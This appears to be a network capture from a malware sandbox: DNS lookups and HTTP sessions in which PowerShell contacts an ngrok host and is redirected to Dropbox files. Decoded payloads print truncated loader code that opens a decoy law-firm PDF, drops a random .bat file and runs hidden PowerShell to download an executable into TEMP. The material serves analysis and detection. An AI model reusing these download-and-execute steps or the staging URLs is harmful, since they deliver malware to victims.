Dec 17, 2024 12:13:36.600630045 CET	192.168.2.8	1.1.1.1	0x4078	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Dec 17, 2024 12:13:37.045089006 CET	192.168.2.8	1.1.1.1	0xd745	Standard query (0)	uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:37.050225019 CET	192.168.2.8	1.1.1.1	0xd4b1	Standard query (0)	uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:37.050960064 CET	192.168.2.8	1.1.1.1	0x2654	Standard query (0)	uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.com	65	IN (0x0001)	false
Dec 17, 2024 12:13:38.976876020 CET	192.168.2.8	1.1.1.1	0x693a	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:38.977137089 CET	192.168.2.8	1.1.1.1	0xc363	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 17, 2024 12:13:38.977474928 CET	192.168.2.8	1.1.1.1	0x296d	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:38.977629900 CET	192.168.2.8	1.1.1.1	0x1b7b	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 17, 2024 12:13:39.003695965 CET	192.168.2.8	1.1.1.1	0xa22b	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:39.003870010 CET	192.168.2.8	1.1.1.1	0x5000	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 17, 2024 12:13:41.601381063 CET	192.168.2.8	1.1.1.1	0xe890	Standard query (0)	ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:47.266246080 CET	192.168.2.8	1.1.1.1	0xfeb8	Standard query (0)	uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:28.541532993 CET	192.168.2.8	1.1.1.1	0xc4d6	Standard query (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 12:13:18.807208061 CET	1.1.1.1	192.168.2.8	0xee90	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.125.102.39	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:18.807208061 CET	1.1.1.1	192.168.2.8	0xee90	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		18.192.31.165	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:18.807208061 CET	1.1.1.1	192.168.2.8	0xee90	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.125.223.134	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:18.807208061 CET	1.1.1.1	192.168.2.8	0xee90	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		18.158.249.75	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:18.807208061 CET	1.1.1.1	192.168.2.8	0xee90	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.125.209.94	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:18.807208061 CET	1.1.1.1	192.168.2.8	0xee90	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.124.142.205	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:22.569360018 CET	1.1.1.1	192.168.2.8	0x3a8a	No error (0)	www.dropbox.com	www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:22.569360018 CET	1.1.1.1	192.168.2.8	0x3a8a	No error (0)	www-env.dropbox-dns.com		162.125.65.18	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:25.401981115 CET	1.1.1.1	192.168.2.8	0xa20a	No error (0)	ucc92cc8797dce098717f308293f.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:25.401981115 CET	1.1.1.1	192.168.2.8	0xa20a	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.69.15	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:33.501965046 CET	1.1.1.1	192.168.2.8	0x89d1	No error (0)	ucafc6786f84446e8965e5916cb2.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:33.501965046 CET	1.1.1.1	192.168.2.8	0x89d1	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.69.15	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:34.399405956 CET	1.1.1.1	192.168.2.8	0x8c3f	No error (0)	www.dropbox.com	www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:34.399405956 CET	1.1.1.1	192.168.2.8	0x8c3f	No error (0)	www-env.dropbox-dns.com		162.125.65.18	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:34.399763107 CET	1.1.1.1	192.168.2.8	0x87f4	No error (0)	www.dropbox.com	www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:34.400947094 CET	1.1.1.1	192.168.2.8	0xebfe	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:34.401865959 CET	1.1.1.1	192.168.2.8	0x540b	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:34.401865959 CET	1.1.1.1	192.168.2.8	0x540b	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:36.738065004 CET	1.1.1.1	192.168.2.8	0x4078	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:36.738137960 CET	1.1.1.1	192.168.2.8	0x5fb5	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:37.289611101 CET	1.1.1.1	192.168.2.8	0xd745	No error (0)	uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:37.289611101 CET	1.1.1.1	192.168.2.8	0xd745	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.69.15	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:37.335432053 CET	1.1.1.1	192.168.2.8	0xd4b1	No error (0)	uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:37.335432053 CET	1.1.1.1	192.168.2.8	0xd4b1	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.69.15	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:37.341662884 CET	1.1.1.1	192.168.2.8	0x2654	No error (0)	uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:39.161443949 CET	1.1.1.1	192.168.2.8	0x693a	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:39.161443949 CET	1.1.1.1	192.168.2.8	0x693a	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:39.162590027 CET	1.1.1.1	192.168.2.8	0xc363	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 17, 2024 12:13:39.162604094 CET	1.1.1.1	192.168.2.8	0x296d	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:39.162604094 CET	1.1.1.1	192.168.2.8	0x296d	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:39.287101984 CET	1.1.1.1	192.168.2.8	0x5000	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 17, 2024 12:13:39.411034107 CET	1.1.1.1	192.168.2.8	0x1b7b	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 17, 2024 12:13:39.411844969 CET	1.1.1.1	192.168.2.8	0xa22b	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:39.411844969 CET	1.1.1.1	192.168.2.8	0xa22b	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:41.907254934 CET	1.1.1.1	192.168.2.8	0xe890	No error (0)	ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:41.907254934 CET	1.1.1.1	192.168.2.8	0xe890	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.69.15	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:42.035036087 CET	1.1.1.1	192.168.2.8	0x7fc3	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:42.035036087 CET	1.1.1.1	192.168.2.8	0x7fc3	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:47.547399998 CET	1.1.1.1	192.168.2.8	0xfeb8	No error (0)	uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:13:47.547399998 CET	1.1.1.1	192.168.2.8	0xfeb8	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.69.15	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:28.769334078 CET	1.1.1.1	192.168.2.8	0xc4d6	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.6.122.107	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:28.769334078 CET	1.1.1.1	192.168.2.8	0xc4d6	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.6.98.232	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:28.769334078 CET	1.1.1.1	192.168.2.8	0xc4d6	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.6.115.182	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:28.769334078 CET	1.1.1.1	192.168.2.8	0xc4d6	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.6.30.85	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:28.769334078 CET	1.1.1.1	192.168.2.8	0xc4d6	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.6.115.64	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:36.463931084 CET	1.1.1.1	192.168.2.8	0x53e	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:36.463931084 CET	1.1.1.1	192.168.2.8	0x53e	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:37.478061914 CET	1.1.1.1	192.168.2.8	0x53e	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:37.478061914 CET	1.1.1.1	192.168.2.8	0x53e	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:38.490958929 CET	1.1.1.1	192.168.2.8	0x53e	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:38.490958929 CET	1.1.1.1	192.168.2.8	0x53e	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:40.507642984 CET	1.1.1.1	192.168.2.8	0x53e	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:40.507642984 CET	1.1.1.1	192.168.2.8	0x53e	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:44.505382061 CET	1.1.1.1	192.168.2.8	0x53e	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:44.505382061 CET	1.1.1.1	192.168.2.8	0x53e	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:20 UTC	230	OUT	GET /api/secure/3fee076f9528f690839c19be95e034f2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app Connection: Keep-Alive
2024-12-17 11:13:22 UTC	321	IN	HTTP/1.1 302 Found Access-Control-Allow-Origin: * Content-Length: 395 Content-Type: text/html; charset=utf-8 Date: Tue, 17 Dec 2024 11:13:22 GMT Location: https://www.dropbox.com/scl/fi/76ojn2f5am0wg3ws7kh33/secure.txt?rlkey=yejog0bk51d3d9mvha5r8cczb&dl=1 Server: Werkzeug/3.0.3 Python/3.12.8 Connection: close
2024-12-17 11:13:22 UTC	395	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 73 68 6f 75 6c 64 20 62 65 20 72 65 64 69 72 65 63 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 74 6f 20 74 68 65 20 74 61 72 67 65 74 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 37 36 6f 6a 6e 32 66 35 61 6d 30 77 67 33 77 73 37 6b 68 33 33 2f 73 65 63 75 72 65 2e 74 78 74 3f 72 6c 6b 65 79 3d 79 65 6a 6f 67 30 62 6b 35 31 64 33 64 39 6d 76 68 61 35 72 38 63 63 7a 62 26 61 6d 70 3b Data Ascii: <!doctype html><html lang=en><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be redirected automatically to the target URL: <a href="https://www.dropbox.com/scl/fi/76ojn2f5am0wg3ws7kh33/secure.txt?rlkey=yejog0bk51d3d9mvha5r8cczb&

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:23 UTC	236	OUT	GET /scl/fi/76ojn2f5am0wg3ws7kh33/secure.txt?rlkey=yejog0bk51d3d9mvha5r8cczb&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com Connection: Keep-Alive
2024-12-17 11:13:25 UTC	4091	IN	HTTP/1.1 302 Found Content-Security-Policy: base-uri 'self' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://ucc92cc8797dce098717f308293f.dl.dropboxusercontent.com/cd/0/get/CgaRoAXn44inIZLi9RO1hk9dvZYwrO3q5ZpYmLnyDB28oFZGSxVrsZU5ZdI03PozFS6meOPOe27VeEOKA8TR_Cth4xi4gw3NsY_8w6WADmBoMW9wvrHJE_uFpbukqFVZ_4L1itIKAEAxwHbXhgKW4e26/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MTI3MjExOTY0NTU2ODQ3Mzk1MzI4NzQ3Mzc1MTE2Njk0MTYzMTUx; Path=/; Expires=Sun, 16 Dec 2029 11:13:24 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=PMLI_tcgeKJyhbO6zFmAtzvE; Path=/; Domain=dropbox.com; Expires=Wed, 17 Dec 2025 11:13:24 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=PMLI_tcgeKJyhbO6zFmAtzvE; Path=/; Expires=Wed, 17 Dec 2025 11:13:24 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=4xV4HoVgho; Path=/; Expires=Wed, 17 Dec 2025 11:13:24 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 16 Dec 2029 11:13:24 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Tue, 17 Dec 2024 11:13:24 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 7d59d9c1ba664c3e92e00d44bc3a7f16 Connection: close
2024-12-17 11:13:25 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:26 UTC	370	OUT	GET /cd/0/get/CgaRoAXn44inIZLi9RO1hk9dvZYwrO3q5ZpYmLnyDB28oFZGSxVrsZU5ZdI03PozFS6meOPOe27VeEOKA8TR_Cth4xi4gw3NsY_8w6WADmBoMW9wvrHJE_uFpbukqFVZ_4L1itIKAEAxwHbXhgKW4e26/file?dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ucc92cc8797dce098717f308293f.dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-17 11:13:27 UTC	734	IN	HTTP/1.1 200 OK Content-Type: application/binary Accept-Ranges: bytes Cache-Control: max-age=60 Content-Disposition: attachment; filename="secure.txt"; filename*=UTF-8''secure.txt Content-Security-Policy: sandbox Etag: 1733833841195969d Pragma: public Referrer-Policy: no-referrer Vary: Origin X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Robots-Tag: noindex, nofollow, noimageindex X-Server-Response-Time: 108 X-Webkit-Csp: sandbox Date: Tue, 17 Dec 2024 11:13:26 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 411 X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 216a6661ade7499b92234804460daec8 Connection: close
2024-12-17 11:13:27 UTC	411	IN	Data Raw: 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 6d 73 65 64 67 65 2e 65 78 65 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 2d 6b 69 6f 73 6b 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 64 67 69 75 72 36 34 76 61 77 6d 64 78 39 61 6c 71 77 36 65 74 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 6b 64 75 68 71 72 6e 70 30 30 72 6a 34 34 72 6a 65 70 70 75 77 33 31 71 6b 26 64 6c 3d 31 22 3b 20 24 52 61 6e 64 6f 6d 46 69 6c 65 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 62 61 74 22 3b 20 49 57 52 20 2d 55 72 69 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 75 61 6e 39 Data Ascii: Start-Process msedge.exe -ArgumentList "--kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1"; $RandomFileName = "$env:temp\$(Get-Random).bat"; IWR -Uri "https://www.dropbox.com/scl/fi/uan9

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:32 UTC	212	OUT	GET /scl/fi/uan9gvebl6408bjvhbjdm/loader.txt?rlkey=k3wwqb6ysaho8yzi78guuwbl1&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com
2024-12-17 11:13:33 UTC	4091	IN	HTTP/1.1 302 Found Content-Security-Policy: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://ucafc6786f84446e8965e5916cb2.dl.dropboxusercontent.com/cd/0/get/CgaKGF4DHA4178nUmndW2edv9zTcUoyufdh9M2yMgQh9ii-6pCJGjPyWnLNeEbb0k3AeS9Egp-h72GNAHpmZo471qKhxX_7Ioh3fqr9pZ0sbAiLI-biIqiNzCP4XwvJw-yFTOiiXqfMv0nKWye9FWFB0/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=NzU5OTQxNjk5OTU0OTYwMzc2ODkzNDU5NDQxMzc2MTM5Nzk1NzA=; Path=/; Expires=Sun, 16 Dec 2029 11:13:32 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=VkK68X_KN1aMsNjemB7bQLpK; Path=/; Domain=dropbox.com; Expires=Wed, 17 Dec 2025 11:13:32 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=VkK68X_KN1aMsNjemB7bQLpK; Path=/; Expires=Wed, 17 Dec 2025 11:13:32 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=_2bGgTgUAc; Path=/; Expires=Wed, 17 Dec 2025 11:13:32 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 16 Dec 2029 11:13:32 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Tue, 17 Dec 2024 11:13:32 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 7b74b1248b694153b737cdb121337a59 Connection: close
2024-12-17 11:13:33 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:34 UTC	370	OUT	GET /cd/0/get/CgaKGF4DHA4178nUmndW2edv9zTcUoyufdh9M2yMgQh9ii-6pCJGjPyWnLNeEbb0k3AeS9Egp-h72GNAHpmZo471qKhxX_7Ioh3fqr9pZ0sbAiLI-biIqiNzCP4XwvJw-yFTOiiXqfMv0nKWye9FWFB0/file?dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ucafc6786f84446e8965e5916cb2.dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-17 11:13:35 UTC	734	IN	HTTP/1.1 200 OK Content-Type: application/binary Accept-Ranges: bytes Cache-Control: max-age=60 Content-Disposition: attachment; filename="loader.txt"; filename*=UTF-8''loader.txt Content-Security-Policy: sandbox Etag: 1733833838862900d Pragma: public Referrer-Policy: no-referrer Vary: Origin X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Robots-Tag: noindex, nofollow, noimageindex X-Server-Response-Time: 168 X-Webkit-Csp: sandbox Date: Tue, 17 Dec 2024 11:13:35 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 804 X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 9779cabb6a874fa593e5080c2f088eaf Connection: close
2024-12-17 11:13:35 UTC	804	IN	Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 49 6e 64 6f 57 53 74 59 4c 65 20 68 69 44 64 65 4e 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 43 6f 6d 6d 61 6e 64 20 22 24 52 61 6e 64 6f 6d 50 44 46 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 2d 43 68 69 6c 64 50 61 74 68 20 28 27 7b 30 7d 2e 70 64 66 27 20 2d 66 20 28 5b 67 75 69 64 5d 3a 3a 4e 65 77 47 75 69 64 28 29 29 29 3b 20 24 52 61 6e 64 6f 6d 45 58 45 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 2d 43 68 69 6c 64 50 61 74 68 20 28 27 7b 30 7d 2e 65 78 65 27 20 2d 66 20 28 5b 67 75 69 64 5d 3a 3a 4e 65 77 47 75 69 64 28 29 29 29 3b 20 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 Data Ascii: @echo offpowershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -U

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:36 UTC	764	OUT	GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1 Host: www.dropbox.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
